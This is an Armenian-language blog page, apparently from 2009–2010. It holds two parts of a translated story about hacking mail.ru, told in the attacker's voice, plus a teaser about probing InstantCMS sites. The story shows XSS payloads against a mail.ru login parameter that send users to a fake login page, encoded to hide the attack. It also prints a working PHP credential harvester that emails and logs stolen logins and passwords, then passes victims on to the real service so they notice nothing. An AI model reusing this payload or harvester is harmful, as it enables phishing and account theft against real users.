Սոցիալական ցա՞նց, թե՞ “անթերի” սկրիպտ – մաս 1

Tuesday, April 27th, 2010

Ինտերնետ օգտվողների կողմից օրեցօր աճող պահանջարկ ունեցող սոցիալական ցանցերն այնքան մեծ տարածում են արդեն գտել, որ շատ-շատերը երազում են ունենալ իրենց սեփական սոցիալական ցանցը… Դու նույնպես… Չէ՞…

Եվ ահա այդ շատ ցանկացողների համար էլ ստեղված է մի համակարգ (այսուհետ կանվանեմ սկրիպտ), որը կոչվում է InstantCMS: Գուցե շատերին անունը ոչինչ չասեց, բայց որոշներին հաստատ ծանոթ սկրիպտ է: Փորձեմ այսօր անդրադառնալ այս սկրիպտի թերություններին:

ՆԱԽԱՀԱՐՁԱԿՈՒՄ

Ահա գտել եմ այդ սկրիպտով աշխատող ինչ-որ կայք, որի բախտը ցավոք չի բերել: Հիմա կփորձենք ստուգել…

Առաջինը, որ աչքի ընկավ, Ադմինիստրացիոն բաժնի ակներև տեղադրություն էր` http://badsite.com/admin : Ոնց էլ չլինի, եթե ուրիշ բան չգտնեմ, էտ հաստատ ասելու բանա… Ու քանի գնում ավելի էր ձգում ինձ սկրպիտը…

Գուգլն ինձ ասաց, որ սկրիպտի պաշտոնական սայթը instantcms.ru-ն էր… Ես էլ գնացի ու … 2 Մեգաբիթանոց կապս սկրիպտը շատ արագ տեղավորեց համակարգչիս կոշտ սկավառակի ամենաակնառու տեղը` ուղիղ էկրանիս… (more…)

Mail.ru – Անհնարին ոչինչ չկա – օր երկրորդ

Tuesday, September 29th, 2009

mail.ru

- – - նյութի սկիզբը կարող եք կարդալ այստեղ – - -

[օր երկրորդ...]

Հաջորդ օրը (ավելի ճիշտ հենց նույն օրը, քանի որ օրն արդեն փոխվել էր) ասկա-իս վրա նամակ եկավ pixcher-ից: Նա սարքել էր ֆիկտիվ ֆորման ու տեղադրել “թունավոր” հասցեում`

http://talk.mail.ru/login.html?target=”><script>location.href=’Վերահասցեավորում դեպի ֆիկտիվ ֆորմա’</script>

Բայց այս վիճակում հղումս ահավոր վախենալու և բացահայտ տեսք ուներ, ու մենք մի քիչ այն դիմակավորեցինք, որպեսզի յուզերները ոչ մի գալիք վտանգ չզգան: Արդյունքում ստացանք ահա սա`

http://talk.mail.ru/login.html?targe…72%69%70%74%3e

Հաջորդ քայլում արդեն գրեցինք մի փոքրիկ սնիֆֆեր, որը ստանում էր իրեն փոխանցված տվյալները, գրում ֆայլի մեջ, իսկ վերջում յուզերին “շպրտում” իր փոստարկղ: Ահա սնիֆֆերիս կոդը`

<?
$adminmail = “mymail@mail.ru”;
function email($to,$mailtext) {
mail($to,’password’,$mailtext,$adminmail);
}
$text=”[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n”;
email($adminmail,$text);
$file = fopen(“logs.txt”,”a”);
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);

echo “<FORM id=’auth’ action=’http://talk.mail.ru/login.html’ method=post>
<INPUT value=’$_POST[login]‘>
<INPUT value=’$_POST[pass]‘>
<script>auth.submit();</script>
</FORM>”;
?>

Ուշադրություն դարձրեք, թե ինչպես է յուզերը մտնում իր փոստարկղ (տող 17)`

<script>auth.submit();</script>

Ֆիկտիվ էջի (այսուհետ` ֆեյկ) պատրաստման գործընթացն էդքան էլ դժվար չէ, ֆայլը պահում ենք մեր կոմպի վինչի մեջ, իսկ form տեգի action փոփոխականը ռեդիռեկտ ենք անում: Արդյունքում, յուզերի կողմից մուտքագրված տվյալները գրվում են իմ ֆայլի մեջ, իսկ ինքը կտեղափոխվի փոստարկղ, ու կմտածի, որ DNS-ի խնդիր էր տեղի ունեցել կայքում…

- – - Շարունակելի – - -

Mail.ru – Անհնարին ոչինչ չկա – օր առաջին

Monday, September 28th, 2009

mail.ru

Այն ինչ գրում եմ, պարզապես ներկայացնում եմ մի հակերի պատմությունը` իր իսկ նկարագրությամբ: Նյութի մեջ առկա տեղեկատվությունը միտված է ընթերցողներին զգուշացնելուն: Նյութի հետևանքների համար ես ՊԱՏԱՍԽԱՆԱՏՈՒ չեմ… Նյութը հասկանալու համար պետք է գոնե մի քիչ գիտելիքներ ունենաք sql-ինյեկցիաների և XSS հարձակումների մասին:

Հասկանալի՞ է… ուրեմն գնացին: Հիշեցնեմ որ պատմությունը պատմվում է հենց այդ մարդու կողմից, իսկ ես միայն թարգմանում եմ..

[օր առաջին...]

Գիշերվա երկուսն է, ես արդեն պատրաստվում էի քնել, բայց որոշեցի նախքան քնելը ստուգել էլ.փոստս: Մտնելով փոստարկղս  (ես գրանցված եմ մեյլ.ռու-ում), տեսա շատ մեծ քանակությամբ սպամ-նամակներ:  Գրողի տարած անտի-սպամ, աշխատում է գրեթե անարդյունք ու զզվել կարելի է: Իսկ առջևում Նոր Տարի է, և կարծես թե հենց մեյլ.ռու-ն ինձ “սպամ-նվերներ” էր մատուցել: Վերջապես ամոթ ա, արի ես էլ նվեր մատուցեմ “շատ սիրելի” փոստային համակարգիս:

Բայց արի ու տես, որ ինչքան էլ քրքեցի սրանց համակարգը, ոչ մի բաց չգտա: Դե ինչ, էստեղ հույս ունեմ կօգնի շատ սիրելի գուգլը: Դե քանի որ մեյլ.ռու-ն ունի շատ այլ ծառայություններ, գուցե հենց դրանց մեջ բաց տեղեր կան, և ես որոնման հարցումս ձևակերպեցի այսպես`  “site:*mail.ru” :  Ի պատասխան դրան, հարգարժան գուգլն իմ առջև բացեց հղումների 20 էջեր (բախտս բերեց դրանց կեսը կրկնվում էին, այլապես հոգեբուժարանում կլինեի հիմա): Լցրեցի սիրելի մեծ բաժակս սուրճով և սկսեցի ստուգել սերվիսները: Ինչքան էլ  զարմանալի լիներ ինձ համար, բայց մեյլ.ռու-ի վեբ կոդեր-ները լավ էին աշխատել, քանի որ 2 ժամանոց աուդիտից հետո ես ոչ մի բաց չէի գտել նրանց կոդի մեջ: Այդ պահի դրությամբ շտկվել էին որոշ թերություններ 7ya.mail.ru սերվիսի աշխատանքում, նկարները դիտելու ժամանակ բացվում էր popup պատուհան, հիշելով հետևյալ հասցեն`

http://7ya.mail.ru/image.php?in=phot…=500&big_h=375

Ես որոշեցի այն մի քիչ տեսքի բերել և ստացվեց ահա այսպիսի գեղեցկուհի`

http://7ya.mail.ru/image.php?in=”><font color=ORANGE size=10>Russian Net Hunters – Rulezzz</font>

Ինչպես տեսնում ես, ստացվեց – Russian Net Hunters Rulezzz. Դե իսկ մեյլ.ռու-ի վերջին սերվիսներից մեկը  форумы@mail.ru-ն էր: Առաջինը, որ փորձեցի, sql-ինյեկցիան էր, որն իհարկե ոչ մի արդյունք չտվեց, իսկ համակարգն ինձ ռեդիռեկտով դուրս շպրտեց մի էջի վրա, որտեղ գրված էր, որ ես գրանցված չեմ: Բայց այստեղ ուշադրությունս գրավեց շատ հետաքրքիր մի տող`

http://talk.mail.ru/login.html?target=

Փորձեցի ստուգել target փոփոխականը XSS-ի տեսանկյունից և բրաուզերիս մեջ հավաքեցի`

http://talk.mail.ru/login.html?target=”><script>alert();</script>

Շատ զարմացա և ուրախացա երբ իմ առջև դուրս թռավ պատուհան, որը նշանակում էր, որ target փոփոխականը ոչ մի ֆիլտրացիա չի անցնում: Ըհը~… ՈՒրեմն որոշված է, սարքում եմ համակարգ մուտք գործելու ֆիկտիվ էջ, որպեսզի յուզերներն իրենք իրենց ձեռքով ինձ ուղարկեն գաղտնաբառերը: Առավոտվա ժամը 5-ն էր,և նույնիսկ 5 բաժակ սուրճից հետո ահավոր քնել էի ուզում (իսկ ավելի շատ զուգարանի կարիք ունեի): Այդ պատճառով խնդրեցի իմ լավ ընկեր pixcher-ին շարունակել իմ սկսած գործը:

—— Շարունակելի —– Խնդրում եմ գրել կարծիքներ, արժե՞ արդյոք շարունակել “Մի կայքի պատմություն” բաժնի մշակումը…


Վճարված գովազդ ::